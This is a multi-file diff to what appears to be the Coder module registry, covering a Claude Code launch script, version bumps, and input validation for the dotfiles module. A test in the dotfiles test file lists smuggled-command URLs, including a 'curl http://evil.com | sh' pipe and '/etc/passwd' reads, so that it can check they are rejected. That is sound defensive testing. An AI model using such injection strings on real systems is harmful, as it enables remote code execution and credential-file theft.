+printf "ARG_CODER_HOST: %s\n" "$ARG_CODER_HOST"
 
-log "--------------------------------\n"
+echo "--------------------------------"
 
 function install_boundary() {
-  if [ "${ARG_COMPILE_FROM_SOURCE:-false}" = "true" ]; then
+  if [ "$ARG_COMPILE_FROM_SOURCE" = "true" ]; then
     # Install boundary by compiling from source
-    log "Compiling boundary from source (version: $ARG_BOUNDARY_VERSION)\n"
+    echo "Compiling boundary from source (version: $ARG_BOUNDARY_VERSION)"
 
-    log "Removing existing boundary directory to allow re-running the script safely\n"
+    echo "Removing existing boundary directory to allow re-running the script safely"
     if [ -d boundary ]; then
       rm -rf boundary
     fi
 
-    log "Clone boundary repository\n"
+    echo "Clone boundary repository"
     git clone https://github.com/coder/boundary.git
     cd boundary
     git checkout "$ARG_BOUNDARY_VERSION"
@@ -61,22 +60,24 @@ function install_boundary() {
     # Build the binary
     make build
 
-    # Install binary and wrapper script (optional)
+    # Install binary
     sudo cp boundary /usr/local/bin/
-    sudo cp scripts/boundary-wrapper.sh /usr/local/bin/boundary-run
-    sudo chmod +x /usr/local/bin/boundary-run
-  else
+    sudo chmod +x /usr/local/bin/boundary
+  elif [ "$ARG_USE_BOUNDARY_DIRECTLY" = "true" ]; then
     # Install boundary using official install script
-    log "Installing boundary using official install script (version: $ARG_BOUNDARY_VERSION)\n"
+    echo "Installing boundary using official install script (version: $ARG_BOUNDARY_VERSION)"
     curl -fsSL https://raw.githubusercontent.com/coder/boundary/main/install.sh | bash -s -- --version "$ARG_BOUNDARY_VERSION"
+  else
+    # Use coder boundary subcommand (default) - no installation needed
+    echo "Using coder boundary subcommand (provided by Coder)"
   fi
 }
 
 function validate_claude_installation() {
   if command_exists claude; then
-    log "Claude Code is installed\n"
+    printf "Claude Code is installed\n"
   else
-    log "Error: Claude Code is not installed. Please enable install_claude_code or install it manually\n"
+    printf "Error: Claude Code is not installed. Please enable install_claude_code or install it manually\n"
     exit 1
   fi
 }
@@ -87,7 +88,7 @@ TASK_SESSION_ID="cd32e253-ca16-4fd3-9825-d837e74ae3c2"
 
 get_project_dir() {
   local workdir_normalized
-  workdir_normalized=$(echo "$ARG_WORKDIR" | tr '/' '-')
+  workdir_normalized=$(echo "$ARG_WORKDIR" | tr '/._' '-')
   echo "$HOME/.claude/projects/${workdir_normalized}"
 }
 
@@ -100,10 +101,10 @@ task_session_exists() {
   session_file=$(get_task_session_file)
 
   if [ -f "$session_file" ]; then
-    log "Task session file found: %s\n" "$session_file"
+    printf "Task session file found: %s\n" "$session_file"
     return 0
   else
-    log "Task session file not found: %s\n" "$session_file"
+    printf "Task session file not found: %s\n" "$session_file"
     return 1
   fi
 }
@@ -114,12 +115,12 @@ is_valid_session() {
   # Check if file exists and is not empty
   # Empty files indicate the session was created but never used so they need to be removed
   if [ ! -f "$session_file" ]; then
-    log "Session validation failed: file does not exist\n"
+    printf "Session validation failed: file does not exist\n"
     return 1
   fi
 
   if [ ! -s "$session_file" ]; then
-    log "Session validation failed: file is empty, removing stale file\n"
+    printf "Session validation failed: file is empty, removing stale file\n"
     rm -f "$session_file"
     return 1
   fi
@@ -129,7 +130,7 @@ is_valid_session() {
   local line_count
   line_count=$(wc -l < "$session_file")
   if [ "$line_count" -lt 2 ]; then
-    log "Session validation failed: incomplete (only %s lines), removing incomplete file\n" "$line_count"
+    printf "Session validation failed: incomplete (only %s lines), removing incomplete file\n" "$line_count"
     rm -f "$session_file"
     return 1
   fi
@@ -137,7 +138,7 @@ is_valid_session() {
   # Validate JSONL format by checking first 3 lines
   # Claude session files use JSONL (JSON Lines) format where each line is valid JSON
   if ! head -3 "$session_file" | jq empty 2> /dev/null; then
-    log "Session validation failed: invalid JSONL format, removing corrupt file\n"
+    printf "Session validation failed: invalid JSONL format, removing corrupt file\n"
     rm -f "$session_file"
     return 1
   fi
@@ -146,12 +147,12 @@ is_valid_session() {
   # This ensures the file structure matches Claude's session format
   if ! grep -q '"sessionId"' "$session_file" \
     || ! grep -m 1 '"sessionId"' "$session_file" | jq -e '.sessionId' > /dev/null 2>&1; then
-    log "Session validation failed: no valid sessionId found, removing malformed file\n"
+    printf "Session validation failed: no valid sessionId found, removing malformed file\n"
     rm -f "$session_file"
     return 1
   fi
 
-  log "Session validation passed: %s\n" "$session_file"
+  printf "Session validation passed: %s\n" "$session_file"
   return 0
 }
 
@@ -160,21 +161,16 @@ has_any_sessions() {
   project_dir=$(get_project_dir)
 
   if [ -d "$project_dir" ] && find "$project_dir" -maxdepth 1 -name "*.jsonl" -size +0c 2> /dev/null | grep -q .; then
-    log "Sessions found in: %s\n" "$project_dir"
+    printf "Sessions found in: %s\n" "$project_dir"
     return 0
   else
-    log "No sessions found in: %s\n" "$project_dir"
+    printf "No sessions found in: %s\n" "$project_dir"
     return 1
   fi
 }
 
 ARGS=()
 
-CORE_COMMAND=()
-if [[ "${ARG_REPORT_TASKS}" == "true" ]]; then
-  CORE_COMMAND+=(agentapi server --type claude --term-width 67 --term-height 1190 --)
-fi
-
 function start_agentapi() {
   # For Task reporting
   export CODER_MCP_ALLOWED_TOOLS="coder_report_task"
@@ -187,7 +183,7 @@ function start_agentapi() {
   fi
 
   if [ -n "$ARG_RESUME_SESSION_ID" ]; then
-    log "Resuming specified session: $ARG_RESUME_SESSION_ID"
+    echo "Resuming specified session: $ARG_RESUME_SESSION_ID"
     ARGS+=(--resume "$ARG_RESUME_SESSION_ID")
     [ "$ARG_DANGEROUSLY_SKIP_PERMISSIONS" = "true" ] && ARGS+=(--dangerously-skip-permissions)
 
@@ -198,45 +194,61 @@ function start_agentapi() {
       session_file=$(get_task_session_file)
 
       if task_session_exists && is_valid_session "$session_file"; then
-        log "Resuming task session: $TASK_SESSION_ID"
+        echo "Resuming task session: $TASK_SESSION_ID"
         ARGS+=(--resume "$TASK_SESSION_ID" --dangerously-skip-permissions)
       else
-        log "Starting new task session: $TASK_SESSION_ID"
+        echo "Starting new task session: $TASK_SESSION_ID"
         ARGS+=(--session-id "$TASK_SESSION_ID" --dangerously-skip-permissions)
         [ -n "$ARG_AI_PROMPT" ] && ARGS+=(-- "$ARG_AI_PROMPT")
       fi
 
     else
       if has_any_sessions; then
-        log "Continuing most recent standalone session"
+        echo "Continuing most recent standalone session"
         ARGS+=(--continue)
         [ "$ARG_DANGEROUSLY_SKIP_PERMISSIONS" = "true" ] && ARGS+=(--dangerously-skip-permissions)
       else
-        log "No sessions found, starting fresh standalone session"
+        echo "No sessions found, starting fresh standalone session"
         [ "$ARG_DANGEROUSLY_SKIP_PERMISSIONS" = "true" ] && ARGS+=(--dangerously-skip-permissions)
         [ -n "$ARG_AI_PROMPT" ] && ARGS+=(-- "$ARG_AI_PROMPT")
       fi
     fi
 
   else
-    log "Continue disabled, starting fresh session"
+    echo "Continue disabled, starting fresh session"
     [ "$ARG_DANGEROUSLY_SKIP_PERMISSIONS" = "true" ] && ARGS+=(--dangerously-skip-permissions)
     [ -n "$ARG_AI_PROMPT" ] && ARGS+=(-- "$ARG_AI_PROMPT")
   fi
 
-  log "Running claude code with args: %s\n" "$(printf '%q ' "${ARGS[@]}")"
+  printf "Running claude code with args: %s\n" "$(printf '%q ' "${ARGS[@]}")"
 
-  if [ "${ARG_ENABLE_BOUNDARY:-false}" = "true" ]; then
+  if [ "$ARG_ENABLE_BOUNDARY" = "true" ]; then
     install_boundary
 
-    log "Starting with coder boundary enabled\n"
+    printf "Starting with coder boundary enabled\n"
 
     BOUNDARY_ARGS+=()
 
-    "${CORE_COMMAND[@]}" boundary-run "${BOUNDARY_ARGS[@]}" -- \
+    # Determine which boundary command to use
+    if [ "$ARG_COMPILE_FROM_SOURCE" = "true" ] || [ "$ARG_USE_BOUNDARY_DIRECTLY" = "true" ]; then
+      # Use boundary binary directly (from compilation or release installation)
+      BOUNDARY_CMD=("boundary")
+    else
+      # Use coder boundary subcommand (default)
+      # Copy coder binary to coder-no-caps. Copying strips CAP_NET_ADMIN capabilities
+      # from the binary, which is necessary because boundary doesn't work with
+      # privileged binaries (you can't launch privileged binaries inside network
+      # namespaces unless you have sys_admin).
+      CODER_NO_CAPS="$(dirname "$(which coder)")/coder-no-caps"
+      cp "$(which coder)" "$CODER_NO_CAPS"
+      BOUNDARY_CMD=("$CODER_NO_CAPS" "boundary")
+    fi
+
+    agentapi server --type claude --term-width 67 --term-height 1190 -- \
+      "${BOUNDARY_CMD[@]}" "${BOUNDARY_ARGS[@]}" -- \
       claude "${ARGS[@]}"
   else
-    "${CORE_COMMAND[@]}" claude "${ARGS[@]}"
+    agentapi server --type claude --term-width 67 --term-height 1190 -- claude "${ARGS[@]}"
   fi
 }
 

registry/coder/modules/code-server/README.md

@@ -14,7 +14,7 @@ Automatically install [code-server](https://github.com/coder/code-server) in a w
 module "code-server" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/code-server/coder"
-  version  = "1.4.2"
+  version  = "1.4.3"
   agent_id = coder_agent.example.id
 }
 ```
@@ -29,7 +29,7 @@ module "code-server" {
 module "code-server" {
   count           = data.coder_workspace.me.start_count
   source          = "registry.coder.com/coder/code-server/coder"
-  version         = "1.4.2"
+  version         = "1.4.3"
   agent_id        = coder_agent.example.id
   install_version = "4.106.3"
 }
@@ -43,7 +43,7 @@ Install the Dracula theme from [OpenVSX](https://open-vsx.org/):
 module "code-server" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/code-server/coder"
-  version  = "1.4.2"
+  version  = "1.4.3"
   agent_id = coder_agent.example.id
   extensions = [
     "dracula-theme.theme-dracula"
@@ -61,7 +61,7 @@ Configure VS Code's [settings.json](https://code.visualstudio.com/docs/getstarte
 module "code-server" {
   count      = data.coder_workspace.me.start_count
   source     = "registry.coder.com/coder/code-server/coder"
-  version    = "1.4.2"
+  version    = "1.4.3"
   agent_id   = coder_agent.example.id
   extensions = ["dracula-theme.theme-dracula"]
   settings = {
@@ -78,7 +78,7 @@ Just run code-server in the background, don't fetch it from GitHub:
 module "code-server" {
   count      = data.coder_workspace.me.start_count
   source     = "registry.coder.com/coder/code-server/coder"
-  version    = "1.4.2"
+  version    = "1.4.3"
   agent_id   = coder_agent.example.id
   extensions = ["dracula-theme.theme-dracula", "ms-azuretools.vscode-docker"]
 }
@@ -92,7 +92,7 @@ You can pass additional command-line arguments to code-server using the `additio
 module "code-server" {
   count           = data.coder_workspace.me.start_count
   source          = "registry.coder.com/coder/code-server/coder"
-  version         = "1.4.2"
+  version         = "1.4.3"
   agent_id        = coder_agent.example.id
   additional_args = "--disable-workspace-trust"
 }
@@ -108,7 +108,7 @@ Run an existing copy of code-server if found, otherwise download from GitHub:
 module "code-server" {
   count      = data.coder_workspace.me.start_count
   source     = "registry.coder.com/coder/code-server/coder"
-  version    = "1.4.2"
+  version    = "1.4.3"
   agent_id   = coder_agent.example.id
   use_cached = true
   extensions = ["dracula-theme.theme-dracula", "ms-azuretools.vscode-docker"]
@@ -121,7 +121,7 @@ Just run code-server in the background, don't fetch it from GitHub:
 module "code-server" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/code-server/coder"
-  version  = "1.4.2"
+  version  = "1.4.3"
   agent_id = coder_agent.example.id
   offline  = true
 }

registry/coder/modules/code-server/main.tf

@@ -44,7 +44,7 @@ variable "settings" {
   default     = {}
 }
 
-variable "machine-settings" {
+variable "machine_settings" {
   type        = any
   description = "A map of template level machine settings to apply to code-server. This will be overwritten at each container start."
   default     = {}
@@ -167,7 +167,7 @@ resource "coder_script" "code-server" {
     INSTALL_PREFIX : var.install_prefix,
     // This is necessary otherwise the quotes are stripped!
     SETTINGS : replace(jsonencode(var.settings), "\"", "\\\""),
-    MACHINE_SETTINGS : replace(jsonencode(var.machine-settings), "\"", "\\\""),
+    MACHINE_SETTINGS : replace(jsonencode(var.machine_settings), "\"", "\\\""),
     OFFLINE : var.offline,
     USE_CACHED : var.use_cached,
     USE_CACHED_EXTENSIONS : var.use_cached_extensions,

registry/coder/modules/cursor/README.md

@@ -16,7 +16,7 @@ Uses the [Coder Remote VS Code Extension](https://github.com/coder/vscode-coder)
 module "cursor" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/cursor/coder"
-  version  = "1.4.0"
+  version  = "1.4.1"
   agent_id = coder_agent.main.id
 }
 ```
@@ -29,7 +29,7 @@ module "cursor" {
 module "cursor" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/cursor/coder"
-  version  = "1.4.0"
+  version  = "1.4.1"
   agent_id = coder_agent.main.id
   folder   = "/home/coder/project"
 }
@@ -45,7 +45,7 @@ The following example configures Cursor to use the GitHub MCP server with authen
 module "cursor" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/cursor/coder"
-  version  = "1.4.0"
+  version  = "1.4.1"
   agent_id = coder_agent.main.id
   folder   = "/home/coder/project"
   mcp = jsonencode({

registry/coder/modules/cursor/main.tf

@@ -66,7 +66,7 @@ locals {
 
 module "vscode-desktop-core" {
   source  = "registry.coder.com/coder/vscode-desktop-core/coder"
-  version = "1.0.0"
+  version = "1.0.2"
 
   agent_id = var.agent_id
 

registry/coder/modules/devcontainers-cli/README.md

@@ -14,8 +14,9 @@ The devcontainers-cli module provides an easy way to install [`@devcontainers/cl
 
 ```tf
 module "devcontainers-cli" {
-  source   = "registry.coder.com/coder/devcontainers-cli/coder"
-  version  = "1.0.34"
-  agent_id = coder_agent.example.id
+  source             = "registry.coder.com/coder/devcontainers-cli/coder"
+  version            = "1.1.0"
+  agent_id           = coder_agent.example.id
+  start_blocks_login = false
 }
 ```

registry/coder/modules/devcontainers-cli/main.tf

@@ -14,10 +14,17 @@ variable "agent_id" {
   description = "The ID of a Coder agent."
 }
 
-resource "coder_script" "devcontainers-cli" {
-  agent_id     = var.agent_id
-  display_name = "devcontainers-cli"
-  icon         = "/icon/devcontainers.svg"
-  script       = templatefile("${path.module}/run.sh", {})
-  run_on_start = true
+variable "start_blocks_login" {
+  type        = bool
+  default     = false
+  description = "Boolean, This option determines whether users can log in immediately or must wait for the workspace to finish running this script upon startup."
+}
+
+resource "coder_script" "devcontainers-cli" {
+  agent_id           = var.agent_id
+  display_name       = "devcontainers-cli"
+  icon               = "/icon/devcontainers.svg"
+  script             = templatefile("${path.module}/run.sh", {})
+  run_on_start       = true
+  start_blocks_login = var.start_blocks_login
 }

registry/coder/modules/dotfiles/README.md

@@ -18,7 +18,7 @@ Under the hood, this module uses the [coder dotfiles](https://coder.com/docs/v2/
 module "dotfiles" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/dotfiles/coder"
-  version  = "1.2.3"
+  version  = "1.4.0"
   agent_id = coder_agent.example.id
 }
 ```
@@ -31,7 +31,7 @@ module "dotfiles" {
 module "dotfiles" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/dotfiles/coder"
-  version  = "1.2.3"
+  version  = "1.4.0"
   agent_id = coder_agent.example.id
 }
 ```
@@ -42,7 +42,7 @@ module "dotfiles" {
 module "dotfiles" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/dotfiles/coder"
-  version  = "1.2.3"
+  version  = "1.4.0"
   agent_id = coder_agent.example.id
   user     = "root"
 }
@@ -54,20 +54,34 @@ module "dotfiles" {
 module "dotfiles" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/dotfiles/coder"
-  version  = "1.2.3"
+  version  = "1.4.0"
   agent_id = coder_agent.example.id
 }
 
 module "dotfiles-root" {
   count        = data.coder_workspace.me.start_count
   source       = "registry.coder.com/coder/dotfiles/coder"
-  version      = "1.2.3"
+  version      = "1.4.0"
   agent_id     = coder_agent.example.id
   user         = "root"
   dotfiles_uri = module.dotfiles.dotfiles_uri
 }
 ```
 
+## SSH vs HTTPS URLs
+
+If your Git provider (e.g. GitLab, GitHub Enterprise) restricts HTTPS cloning, use an SSH URL instead:
+
+```text
+# HTTPS (may fail if HTTP cloning is disabled)
+https://gitlab.example.com/user/dotfiles.git
+
+# SSH (uses the workspace's SSH key)
+git@gitlab.example.com:user/dotfiles.git
+```
+
+When a Git provider has HTTPS cloning disabled server-side, the clone will silently fail (the `.git` folder may exist but the working tree will be empty). SSH URLs avoid this because they authenticate with the workspace's SSH key instead of a token-based HTTPS flow.
+
 ## Setting a default dotfiles repository
 
 You can set a default dotfiles repository for all users by setting the `default_dotfiles_uri` variable:
@@ -76,7 +90,7 @@ You can set a default dotfiles repository for all users by setting the `default_
 module "dotfiles" {
   count                = data.coder_workspace.me.start_count
   source               = "registry.coder.com/coder/dotfiles/coder"
-  version              = "1.2.3"
+  version              = "1.4.0"
   agent_id             = coder_agent.example.id
   default_dotfiles_uri = "https://github.com/coder/dotfiles"
 }

registry/coder/modules/dotfiles/main.test.ts

@@ -12,20 +12,48 @@ describe("dotfiles", async () => {
     agent_id: "foo",
   });
 
-  it("default output", async () => {
+  it("default output is empty string", async () => {
     const state = await runTerraformApply(import.meta.dir, {
       agent_id: "foo",
     });
     expect(state.outputs.dotfiles_uri.value).toBe("");
   });
 
-  it("set a default dotfiles_uri", async () => {
-    const default_dotfiles_uri = "foo";
-    const state = await runTerraformApply(import.meta.dir, {
-      agent_id: "foo",
-      default_dotfiles_uri,
-    });
-    expect(state.outputs.dotfiles_uri.value).toBe(default_dotfiles_uri);
+  it("accepts valid git URL formats", async () => {
+    const validUrls = [
+      "https://github.com/coder/dotfiles",
+      "https://github.com/coder/dotfiles.git",
+      "git@github.com:coder/dotfiles.git",
+      "git://github.com/coder/dotfiles.git",
+      "ssh://git@github.com/coder/dotfiles.git",
+      "ssh://git@bitbucket.example.org:7999/~myusername/dotfiles.git",
+    ];
+    for (const url of validUrls) {
+      const state = await runTerraformApply(import.meta.dir, {
+        agent_id: "foo",
+        dotfiles_uri: url,
+      });
+      expect(state.outputs.dotfiles_uri.value).toBe(url);
+    }
+  });
+
+  it("rejects invalid or malicious URLs", async () => {
+    const invalidUrls = [
+      "https://github.com/user/repo; curl http://evil.com | sh",
+      "https://github.com/$(whoami)/repo",
+      "https://github.com/`id`/repo",
+      "https://github.com/user/repo|cat /etc/passwd",
+      "file:///etc/passwd",
+      "not-a-valid-url",
+    ];
+    for (const url of invalidUrls) {
+      await expect(
+        runTerraformApply(import.meta.dir, {
+          agent_id: "foo",
+          dotfiles_uri: url,
+        }),
+      ).rejects.toThrow();
+    }
   });
 
   it("set custom order for coder_parameter", async () => {
@@ -34,7 +62,41 @@ describe("dotfiles", async () => {
       agent_id: "foo",
       coder_parameter_order: order.toString(),
     });
+    expect(state.resources).toHaveLength(3);
+    const parameters = state.resources.filter(
+      (r) => r.type === "coder_parameter",
+    );
+    for (const param of parameters) {
+      expect(param.instances[0].attributes.order).toBe(order);
+    }
+  });
+
+  it("set custom dotfiles_branch", async () => {
+    const branch = "develop";
+    const state = await runTerraformApply(import.meta.dir, {
+      agent_id: "foo",
+      dotfiles_branch: branch,
+    });
     expect(state.resources).toHaveLength(2);
-    expect(state.resources[0].instances[0].attributes.order).toBe(order);
+    const scriptResource = state.resources.find(
+      (r) => r.type === "coder_script",
+    );
+    expect(scriptResource?.instances[0].attributes.script).toContain(
+      `DOTFILES_BRANCH="${branch}"`,
+    );
+  });
+
+  it("default dotfiles_branch creates parameter", async () => {
+    const state = await runTerraformApply(import.meta.dir, {
+      agent_id: "foo",
+    });
+    expect(state.resources).toHaveLength(3);
+    const branchParameter = state.resources.find(
+      (r) =>
+        r.type === "coder_parameter" &&
+        r.instances[0].attributes.name === "dotfiles_branch",
+    );
+    expect(branchParameter).toBeDefined();
+    expect(branchParameter?.instances[0].attributes.default).toBeNull();
   });
 });

registry/coder/modules/dotfiles/main.tf

@@ -29,26 +29,64 @@ variable "agent_id" {
 variable "description" {
   type        = string
   description = "A custom description for the dotfiles parameter. This is shown in the UI - and allows you to customize the instructions you give to your users."
-  default     = "Enter a URL for a [dotfiles repository](https://dotfiles.github.io) to personalize your workspace"
+  default     = "Enter a URL for a [dotfiles repository](https://dotfiles.github.io) to personalize your workspace. Use an SSH URL (e.g. `git@host:user/repo`) if your Git provider restricts HTTPS cloning."
 }
 
 variable "default_dotfiles_uri" {
   type        = string
   description = "The default dotfiles URI if the workspace user does not provide one"
   default     = ""
+
+  validation {
+    condition = (
+      var.default_dotfiles_uri == "" ||
+      can(regex("^(https?://|ssh://|git@|git://)[a-zA-Z0-9._/:@~-]+$", var.default_dotfiles_uri))
+    )
+    error_message = "Must be a valid dotfiles repository URL (https, git@, or git://) without special characters."
+  }
+}
+
+variable "default_dotfiles_branch" {
+  type        = string
+  description = "The default dotfiles branch if the workspace user does not provide one"
+  default     = ""
 }
 
 variable "dotfiles_uri" {
   type        = string
   description = "The URL to a dotfiles repository. (optional, when set, the user isn't prompted for their dotfiles)"
+  default     = null
 
-  default = null
+  validation {
+    condition = (
+      var.dotfiles_uri == null ||
+      var.dotfiles_uri == "" ||
+      can(regex("^(https?://|ssh://|git@|git://)[a-zA-Z0-9._/:@~-]+$", var.dotfiles_uri))
+    )
+    error_message = "Must be a valid dotfiles repository URL (https, git@, or git://) without special characters."
+  }
+}
+
+variable "dotfiles_branch" {
+  type        = string
+  description = "The branch to use for the dotfiles repository (optional, when set, the user isn't prompted for the branch)"
+  default     = null
+
+  validation {
+    condition     = var.dotfiles_branch == null || var.dotfiles_branch != ""
+    error_message = "dotfiles_branch cannot be an empty string. Use null to prompt the user or provide a valid branch name."
+  }
 }
 
 variable "user" {
   type        = string
   description = "The name of the user to apply the dotfiles to. (optional, applies to the current user by default)"
   default     = null
+
+  validation {
+    condition     = var.user == null || can(regex("^[a-zA-Z_][a-zA-Z0-9_-]*$", var.user))
+    error_message = "Must be a valid username without special characters."
+  }
 }
 
 variable "coder_parameter_order" {
@@ -63,6 +101,12 @@ variable "manual_update" {
   default     = false
 }
 
+variable "post_clone_script" {
+  description = "Custom script to run after applying dotfiles. Runs every time, even if dotfiles were already applied."
+  type        = string
+  default     = null
+}
+
 data "coder_parameter" "dotfiles_uri" {
   count        = var.dotfiles_uri == null ? 1 : 0
   type         = "string"
@@ -73,18 +117,39 @@ data "coder_parameter" "dotfiles_uri" {
   description  = var.description
   mutable      = true
   icon         = "/icon/dotfiles.svg"
+
+  validation {
+    regex = "^$|^(https?://|ssh://|git@|git://)[a-zA-Z0-9._/:@~-]+$"
+    error = "Must be a valid dotfiles repository URL (https, git@, or git://) without special characters."
+  }
+}
+
+data "coder_parameter" "dotfiles_branch" {
+  count        = var.dotfiles_branch == null ? 1 : 0
+  type         = "string"
+  name         = "dotfiles_branch"
+  display_name = "Dotfiles Branch"
+  order        = var.coder_parameter_order
+  default      = var.default_dotfiles_branch
+  description  = "The branch to use for the dotfiles repository"
+  mutable      = true
+  icon         = "/icon/dotfiles.svg"
 }
 
 locals {
-  dotfiles_uri = var.dotfiles_uri != null ? var.dotfiles_uri : data.coder_parameter.dotfiles_uri[0].value
-  user         = var.user != null ? var.user : ""
+  dotfiles_uri              = var.dotfiles_uri != null ? var.dotfiles_uri : data.coder_parameter.dotfiles_uri[0].value
+  dotfiles_branch           = var.dotfiles_branch != null ? var.dotfiles_branch : data.coder_parameter.dotfiles_branch[0].value
+  user                      = var.user != null ? var.user : ""
+  encoded_post_clone_script = var.post_clone_script != null ? base64encode(var.post_clone_script) : ""
 }
 
 resource "coder_script" "dotfiles" {
   agent_id = var.agent_id
   script = templatefile("${path.module}/run.sh", {
     DOTFILES_URI : local.dotfiles_uri,
-    DOTFILES_USER : local.user
+    DOTFILES_USER : local.user,
+    DOTFILES_BRANCH : local.dotfiles_branch,
+    POST_CLONE_SCRIPT : local.encoded_post_clone_script
   })
   display_name = "Dotfiles"
   icon         = "/icon/dotfiles.svg"
@@ -101,7 +166,9 @@ resource "coder_app" "dotfiles" {
   group        = var.group
   command = templatefile("${path.module}/run.sh", {
     DOTFILES_URI : local.dotfiles_uri,
-    DOTFILES_USER : local.user
+    DOTFILES_USER : local.user,
+    DOTFILES_BRANCH : local.dotfiles_branch,
+    POST_CLONE_SCRIPT : local.encoded_post_clone_script
   })
 }
 

registry/coder/modules/dotfiles/run.sh

@@ -4,6 +4,20 @@ set -euo pipefail
 
 DOTFILES_URI="${DOTFILES_URI}"
 DOTFILES_USER="${DOTFILES_USER}"
+DOTFILES_BRANCH="${DOTFILES_BRANCH}"
+
+# Validate DOTFILES_URI to prevent command injection (defense in depth)
+if [ -n "$DOTFILES_URI" ]; then
+  # shellcheck disable=SC2250
+  if [[ "$DOTFILES_URI" =~ [^a-zA-Z0-9._/:@-] ]]; then
+    echo "ERROR: DOTFILES_URI contains invalid characters" >&2
+    exit 1
+  fi
+  if ! [[ "$DOTFILES_URI" =~ ^(https?://|ssh://|git@|git://) ]]; then
+    echo "ERROR: DOTFILES_URI must be a valid repository URL (https://, http://, ssh://, git@, or git://)" >&2
+    exit 1
+  fi
+fi
 
 # shellcheck disable=SC2157
 if [ -n "$${DOTFILES_URI// }" ]; then
@@ -11,17 +25,45 @@ if [ -n "$${DOTFILES_URI// }" ]; then
     DOTFILES_USER="$USER"
   fi
 
-  echo "✨ Applying dotfiles for user $DOTFILES_USER"
+  if [ -n "$DOTFILES_BRANCH" ]; then
+    echo "✨ Applying dotfiles for user $DOTFILES_USER from branch $DOTFILES_BRANCH"
+  else
+    echo "✨ Applying dotfiles for user $DOTFILES_USER"
+  fi
 
   if [ "$DOTFILES_USER" = "$USER" ]; then
-    coder dotfiles "$DOTFILES_URI" -y 2>&1 | tee ~/.dotfiles.log
+    if [ -n "$DOTFILES_BRANCH" ]; then
+      coder dotfiles "$DOTFILES_URI" --branch "$DOTFILES_BRANCH" -y 2>&1 | tee ~/.dotfiles.log
+    else
+      coder dotfiles "$DOTFILES_URI" -y 2>&1 | tee ~/.dotfiles.log
+    fi
   else
-    # The `eval echo ~"$DOTFILES_USER"` part is used to dynamically get the home directory of the user, see https://superuser.com/a/484280
-    # eval echo ~coder -> "/home/coder"
-    # eval echo ~root  -> "/root"
+    if command -v getent > /dev/null 2>&1; then
+      DOTFILES_USER_HOME=$(getent passwd "$DOTFILES_USER" | cut -d: -f6)
+    else
+      DOTFILES_USER_HOME=$(awk -F: -v user="$DOTFILES_USER" '$1 == user {print $6}' /etc/passwd)
+    fi
+    if [ -z "$DOTFILES_USER_HOME" ]; then
+      echo "ERROR: Could not determine home directory for user $DOTFILES_USER" >&2
+      exit 1
+    fi
 
-    CODER_BIN=$(which coder)
-    DOTFILES_USER_HOME=$(eval echo ~"$DOTFILES_USER")
-    sudo -u "$DOTFILES_USER" sh -c "'$CODER_BIN' dotfiles '$DOTFILES_URI' -y 2>&1 | tee '$DOTFILES_USER_HOME'/.dotfiles.log"
+    CODER_BIN=$(command -v coder)
+    if [ -n "$DOTFILES_BRANCH" ]; then
+      sudo -u "$DOTFILES_USER" "$CODER_BIN" dotfiles "$DOTFILES_URI" --branch "$DOTFILES_BRANCH" -y 2>&1 | tee "$DOTFILES_USER_HOME/.dotfiles.log"
+    else
+      sudo -u "$DOTFILES_USER" "$CODER_BIN" dotfiles "$DOTFILES_URI" -y 2>&1 | tee "$DOTFILES_USER_HOME/.dotfiles.log"
+    fi
   fi
 fi
+
+POST_CLONE_SCRIPT="${POST_CLONE_SCRIPT}"
+
+if [ -n "$POST_CLONE_SCRIPT" ]; then
+  echo "Running post-clone script..."
+  POST_CLONE_TMP=$(mktemp)
+  echo "$POST_CLONE_SCRIPT" | base64 -d > "$POST_CLONE_TMP"
+  chmod +x "$POST_CLONE_TMP"
+  $POST_CLONE_TMP
+  rm "$POST_CLONE_TMP"
+fi

registry/coder/modules/git-config/README.md

@@ -14,7 +14,7 @@ Runs a script that updates git credentials in the workspace to match the user's
 module "git-config" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/git-config/coder"
-  version  = "1.0.32"
+  version  = "1.0.33"
   agent_id = coder_agent.main.id
 }
 ```
@@ -29,7 +29,7 @@ TODO: Add screenshot
 module "git-config" {
   count              = data.coder_workspace.me.start_count
   source             = "registry.coder.com/coder/git-config/coder"
-  version            = "1.0.32"
+  version            = "1.0.33"
   agent_id           = coder_agent.main.id
   allow_email_change = true
 }
@@ -43,7 +43,7 @@ TODO: Add screenshot
 module "git-config" {
   count                 = data.coder_workspace.me.start_count
   source                = "registry.coder.com/coder/git-config/coder"
-  version               = "1.0.32"
+  version               = "1.0.33"
   agent_id              = coder_agent.main.id
   allow_username_change = false
   allow_email_change    = false

registry/coder/modules/git-config/main.tf

@@ -44,6 +44,9 @@ data "coder_parameter" "user_email" {
   description  = "Git user.email to be used for commits. Leave empty to default to Coder user's email."
   display_name = "Git config user.email"
   mutable      = true
+  styling = jsonencode({
+    placeholder = data.coder_workspace_owner.me.email
+  })
 }
 
 data "coder_parameter" "username" {
@@ -55,6 +58,9 @@ data "coder_parameter" "username" {
   description  = "Git user.name to be used for commits. Leave empty to default to Coder user's Full Name."
   display_name = "Full Name for Git config"
   mutable      = true
+  styling = jsonencode({
+    placeholder = coalesce(data.coder_workspace_owner.me.full_name, data.coder_workspace_owner.me.name)
+  })
 }
 
 resource "coder_env" "git_author_name" {

registry/coder/modules/jetbrains/README.md

@@ -42,7 +42,7 @@ module "jetbrains" {
   version  = "1.3.0"
   agent_id = coder_agent.main.id
   folder   = "/home/coder/project"
-  default  = ["PY", "IU"] # Pre-configure GoLand and IntelliJ IDEA
+  default  = ["PY", "IU"] # Pre-configure PyCharm and IntelliJ IDEA
 }
 ```
 

registry/coder/modules/jfrog-xray/README.md

@@ -0,0 +1,75 @@
+---
+display_name: JFrog Xray
+description: Fetch container image vulnerability scan results from JFrog Xray
+icon: ../../../../.icons/jfrog-xray.svg
+verified: true
+tags: [jfrog, xray]
+---
+
+# JFrog Xray
+
